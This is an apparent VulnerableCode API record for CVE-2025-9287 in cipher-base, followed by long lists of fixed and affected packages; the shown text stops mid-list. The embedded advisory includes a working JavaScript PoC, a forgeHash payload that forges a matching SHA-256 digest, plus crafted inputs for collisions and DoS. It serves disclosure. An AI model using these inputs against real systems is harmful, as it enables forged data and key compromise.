Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/28130?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28130?format=api", "vulnerability_id": "VCID-tt31-4d54-k7cz", "summary": "cipher-base is missing type checks, leading to hash rewind and passing on crafted data\n### Summary\n\nThis affects e.g. `create-hash` (and `crypto-browserify`), so I'll describe the issue against that package\nAlso affects `create-hmac` and other packages\n\nNode.js `createHash` works only on strings or instances of Buffer, TypedArray, or DataView.\n\nMissing input type checks (in npm `create-hash` polyfill of Node.js `createHash`) can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.\n\n### Details\n\nSee PoC\n\n### PoC\n```js\nconst createHash = require('create-hash/browser.js')\nconst { randomBytes } = require('crypto')\n\nconst sha256 = (...messages) => {\n const hash = createHash('sha256')\n messages.forEach((m) => hash.update(m))\n return hash.digest('hex')\n}\n\nconst validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever\n\nconst payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')\nconst receivedMessage = JSON.parse(payload) // e.g. over network, whatever\n\nconsole.log(sha256(...validMessage))\nconsole.log(sha256(...receivedMessage))\nconsole.log(receivedMessage[0])\n```\n\nOutput:\n```\n9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9\n9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9\nHashed input means safe\n```\n\nThis works with:\n```js\nconst forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])\n```\n\nBut there are other types of input which lead to unchecked results\n\n### Impact\n\n1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.\n2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }`\n This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js)\n4. DoS on `{length:'1e99'}`\n5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like [GHSA-vjh7-7g9h-fjfh](https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh))\n6. Also, other typed arrays results are invalid, e.g. returned hash of `new Uint16Array(5)` is the same as `new Uint8Array(5)`, not `new Uint16Array(10)` as it should have been (and is in Node.js `crypto`) -- same for arrays with values non-zero, their hashes are just truncated to `%256` instead of converted to correct bytelength", "aliases": [ { "alias": "CVE-2025-9287" }, { "alias": "GHSA-cpq7-6gpm-g9rc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/932144?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.4-4?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-4%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/932145?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.4-4%2Bdeb11u1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-4%252Bdeb11u1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/932143?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-6%252Bdeb12u1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1051076?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb12u1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-6%252Bdeb12u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/932148?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.4-6%2Bdeb13u1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-6%252Bdeb13u1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/932147?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.6-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.6-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/932146?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.6%2B~1.0.3-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.6%252B~1.0.3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1103001?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.7%2B~1.0.3-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.7%252B~1.0.3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/69807?format=api", "purl": "pkg:npm/cipher-base@1.0.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.5" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1051074?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.4-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/1051075?format=api", "purl": "pkg:deb/debian/node-cipher-base@1.0.4-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-cipher-base@1.0.4-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/793457?format=api", "purl": "pkg:npm/cipher-base@1.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/793458?format=api", "purl": "pkg:npm/cipher-base@1.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/793459?format=api", "purl": "pkg:npm/cipher-base@1.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/793460?format=api", "purl": "pkg:npm/cipher-base@1.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/793461?format=api", "purl": "pkg:npm/cipher-base@1.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/cipher-base@1.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89296?format=api", "purl": "pkg:rpm/redhat/acm-cli@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-cli@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89281?format=api", "purl": "pkg:rpm/redhat/acm-cluster-permission@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-cluster-permission@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89307?format=api", "purl": "pkg:rpm/redhat/acm-governance-policy-addon-controller@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-governance-policy-addon-controller@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89338?format=api", "purl": "pkg:rpm/redhat/acm-governance-policy-framework-addon@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-governance-policy-framework-addon@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89284?format=api", "purl": "pkg:rpm/redhat/acm-grafana@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-grafana@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89316?format=api", "purl": "pkg:rpm/redhat/acm-multicluster-observability-addon@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-multicluster-observability-addon@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89300?format=api", "purl": "pkg:rpm/redhat/acm-must-gather@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-must-gather@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89314?format=api", "purl": "pkg:rpm/redhat/acm-operator-bundle@container-v2.12?arch=5-9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-operator-bundle@container-v2.12%3Farch=5-9" }, { "url": "http://public2.vulnerablecode.io/api/packages/89290?format=api", "purl": "pkg:rpm/redhat/acm-prometheus-config-reloader@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-prometheus-config-reloader@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89291?format=api", "purl": "pkg:rpm/redhat/acm-prometheus-operator@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-prometheus-operator@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89342?format=api", "purl": "pkg:rpm/redhat/acm-search-indexer@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-indexer@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89339?format=api", "purl": "pkg:rpm/redhat/acm-search-v2-api@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-v2-api@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89308?format=api", "purl": "pkg:rpm/redhat/acm-search-v2-operator@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-v2-operator@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89337?format=api", "purl": "pkg:rpm/redhat/acm-siteconfig@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-siteconfig@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89273?format=api", "purl": "pkg:rpm/redhat/acm-volsync-addon-controller@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-volsync-addon-controller@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89289?format=api", "purl": "pkg:rpm/redhat/cert-policy-controller@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/cert-policy-controller@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89343?format=api", "purl": "pkg:rpm/redhat/cluster-backup-operator@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/cluster-backup-operator@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89350?format=api", "purl": "pkg:rpm/redhat/config-policy-controller@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/config-policy-controller@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89333?format=api", "purl": "pkg:rpm/redhat/console@container-v2.12?arch=5-5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/console@container-v2.12%3Farch=5-5" }, { "url": "http://public2.vulnerablecode.io/api/packages/89330?format=api", "purl": "pkg:rpm/redhat/endpoint-monitoring-operator@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/endpoint-monitoring-operator@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89275?format=api", "purl": "pkg:rpm/redhat/governance-policy-propagator@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/governance-policy-propagator@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89297?format=api", "purl": "pkg:rpm/redhat/grafana-dashboard-loader@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/grafana-dashboard-loader@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89278?format=api", "purl": "pkg:rpm/redhat/insights-client@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/insights-client@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89294?format=api", "purl": "pkg:rpm/redhat/insights-metrics@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/insights-metrics@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89303?format=api", "purl": "pkg:rpm/redhat/klusterlet-addon-controller@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/klusterlet-addon-controller@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89324?format=api", "purl": "pkg:rpm/redhat/kube-rbac-proxy@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/kube-rbac-proxy@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89277?format=api", "purl": "pkg:rpm/redhat/kube-state-metrics@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/kube-state-metrics@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89305?format=api", "purl": "pkg:rpm/redhat/memcached-exporter@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/memcached-exporter@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89326?format=api", "purl": "pkg:rpm/redhat/metrics-collector@container-v2.12?arch=5-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/metrics-collector@container-v2.12%3Farch=5-4" }, { "url": "http://public2.vulnerablecode.io/api/packages/89351?format=api", "purl": "pkg:rpm/redhat/multicloud-integrations@container-v2.12?arch=5-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicloud-integrations@container-v2.12%3Farch=5-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89302?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-addon-manager@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-addon-manager@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89344?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-assisted-image-service@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-image-service@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89317?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-assisted-installer@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89340?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-assisted-installer-agent@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer-agent@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89320?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-assisted-installer-controller@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer-controller@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89310?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-assisted-service-8@container-v2.7?arch=6-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-service-8@container-v2.7%3Farch=6-2" }, { "url": "http://public2.vulnerablecode.io/api/packages/89329?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-assisted-service-9@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-service-9@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89345?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-cluster-api-provider-agent@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-api-provider-agent@container-v2.7%3Farch=6-3" }, { "url": "http://public2.vulnerablecode.io/api/packages/89347?format=api", "purl": "pkg:rpm/redhat/multicluster-engine-cluster-api-provider-kubevirt@container-v2.7?arch=6-3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4pq8-1dxx-37gj" }, { "vulnerability": "VCID-eraj-dyxs-xkfd" }, { "vulnerability": "VCID-fr74-wcxv-quam" }, { "vulnerability": "VCID-tt31-4d54-k7cz" } ], "resource_url": 